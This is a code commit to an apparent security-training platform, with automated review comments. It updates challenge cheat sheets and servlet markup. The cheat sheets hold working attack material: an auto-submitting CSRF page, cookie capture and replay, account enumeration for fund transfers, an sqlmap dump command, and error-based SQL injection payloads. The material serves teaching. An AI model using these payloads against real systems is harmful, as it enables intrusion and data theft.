Updating SQL Stored Procedure Challenge Cheat Sheet
markdenihan committed Jun 25, 2015
1 parent 069f9b5 commit e08e64a
Showing 2 changed files with 2 additions and 2 deletions.
2 changes: 1 addition & 1 deletion SecurityShepherdCore/database/coreSchema.sql
Expand Up @@ -1500,7 +1500,7 @@ CALL cheatSheetCreate('bf847c4a8153d487d6ec36f4fca9b77749597c64', "Sign into the
CALL cheatSheetCreate('fcc2558e0a23b8420e173cf8029876cb887408d3', "To complete this challenge, you must force another user to submit a post request which contains a JSON payload. The easiest way to achieve this is to force the user to visit a custom web page that submits the post request. This means the web page needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. It is possible to use HTML forms to submit cross domain POST requets with JSON payloads by setting the <b>enctype</b> attribute to text/plain and then forming the JSON payload around the necessary equals symbol which normally deliminates the parameter name from the parameter value. The following is an example web page that would complete the challenge<br/><br/>&lt;html&gt;<br/>&lt;body&gt;<br/>&lt;form id=&quot;completeChallengeJson&quot; enctype=&quot;text/plain&quot; action=&quot;https://hostname:port/user/csrfchallengetwo/plusplus&quot; method=&quot;POST&quot; &gt;<br/>&lt;input type=&quot;hidden&quot; name=&#x27;{&quot;userId&quot;:&quot;exampleId&quot;,&quot;&#x27; value=&#x27;&quot;,&quotend&quote}&#x27;><br/>&lt;/form&gt;<br/>&lt;script&gt;<br/>document.forms[&quot;completeChallengeJson&quot;].submit();<br/>&lt;/script&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/>The class form function should be used to create an iframe that forces the user to visit this attack page.");
CALL cheatSheetCreate('6158a695f20f9286d5f12ff3f4d42678f4a9740c', "To complete this challenge, you must be able to capture the traffic of another user. The simplest way to simulate this would be to create a second user account and open it in a separate browser and open this challenge. You could then just steal the cookie straight from the browser. To demo how to solve this as expected you would actually open Wireshark and record the 2nd user opening the challenge. Filter the network capture for ip.dst == ShepherdInstanceIp, and find the unencrypted HTTP packet. Right click it and select 'Follow TCP stream'. You'll see the cookie in that dialog. <br><br> Once you have the token collected, in your original browser, click the button and intercept the request with a Proxy. Replace your cookie value with the one you collected from another user.");
CALL cheatSheetCreate('de626470273c01388629e5a56ac6f17e2eef957b', "To complete this challenge you must first register an account. The account must have a unique name. The next step is to click the refresh balance button. Capture this request, and replay it with different account numbers until you find one with cash. If you are the first person to attempt this challenge, the account number 1 should have 10 million in it. Take note of the account number that has cash. Now fill out the 'Transfer Funds' form with any data. Capture that requets and change the receiver account number parameter to the value the sender account number parameter is currently equal to (This is your account number), change the sender account number to the identifier you noted earlier and set the transfer amount to as high as possible (must be some money left in account to work). Keep doing this untill your account has more than 5 million in it. Then open the level again or sign in / out of the account to get the result key");
CALL cheatSheetCreate('dc89383763c68cba0aaa1c6f3fd4c17e9d49a805', 'To complete this challenge manually is extremely difficult and time consuming. It is recommended to use a tool like sqlmap to get the data required. the following sqlmap command will complete this level for you;<br><br>python.exe sqlmap.py --level 5 --risk 3 -u &quot;https://<b>environmentAddress</b>/challenges/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7&quot; --data=&quot;userIdentity=test&quot; --dbms MySQL --cookie="<b>YourCookieValue</b>&quot; --dump');
CALL cheatSheetCreate('dc89383763c68cba0aaa1c6f3fd4c17e9d49a805', "The following attack vectors will expose the result key over two queries.<br><br>Step One: <b>test' AND (SELECT 7303 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(comment AS CHAR),0x20)),1,50) FROM sqlchalstoredproc.customers ORDER BY customerId LIMIT 2,1),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hdTL'='hdTL</b><br><br>This will return an error revealing the first part of the key in the message with <b>qxkzq1</b> added to the end for padding. remove those characters and record the rest of the key revealed. <br><br>Step Two: <b>test' AND (SELECT 9441 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(comment AS CHAR),0x20)),51,50) FROM sqlchalstoredproc.customers ORDER BY customerId LIMIT 2,1),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ilGf'='ilGf</b><br><br>This will reveal the second part of the key, padded with <b>qkjvq</b> at the start and <b>qxkzq1</b> at the end. Remove the padding and add the rest to the previously revealed part of the result key. That is the key to solve this challenge.");

COMMIT;
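Review bot: the new cheat text for dc89383763c68cba0aaa1c6f3fd4c17e9d49a805 is inconsistent about the padding markers between its two steps. Step One tells the reader to strip only "qxkzq1" from the end of the first fragment, but its CONCAT uses the same 0x716b6a7671 prefix as Step Two, so that fragment is also prefixed with "qkjvq"; state that in Step One as Step Two does, otherwise a reader following the text records five extra leading characters and assembles a wrong key. Two smaller points while this line is being touched: "remove those characters" starts a sentence and should be capitalised, and since the CheatSheet servlet writes result[1] to the page unencoded, the HTML embedded in this SQL string literal is trusted markup, so keep its <b> and <br> tags balanced as they are here and avoid introducing unescaped double quotes inside the double-quoted literal.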

Expand Up @@ -79,7 +79,7 @@ public void doPost (HttpServletRequest request, HttpServletResponse response)
if(result != null)
{
out.write(
"<div id='theActualCheat' style='float: right; margin 0; width: 685px;border-color:#A878EF; border-style:dashed; background-color: #D4D4D4; padding-top:5px; padding-bottom:5px; padding-right:5px; padding-left:5px;'>" +
"<div id='theActualCheat' style='float: right; margin 0; width: 685px;border-color:#A878EF; border-style:dashed; background-color: #D4D4D4; padding-top:5px; padding-bottom:5px; padding-right:5px; padding-left:5px; margin-bottom:10px;'>" +
"<big style='color:#A878EF;'>" + encoder.encodeForHTML(result[0]) + " Cheat</big>" +
"<p>" +
result[1] +
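Review bot: the only change here is appending "margin-bottom:10px;" to an already long inline style string in Java source. Consider moving these declarations into a stylesheet rule keyed on the existing id theActualCheat so layout tweaks do not require editing and recompiling the servlet. While on this line, "margin 0;" in the same string is missing its colon and is an invalid declaration that browsers silently drop; it should read "margin: 0;" if that spacing is intended. Unchanged context worth a comment in the code: result[0] goes through encoder.encodeForHTML but result[1] is written raw, which is evidently deliberate because the cheat text carries markup, so a one-line comment stating that the cheat-sheet column is trusted HTML would stop a future reader from "fixing" it or, worse, assuming it is encoded.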
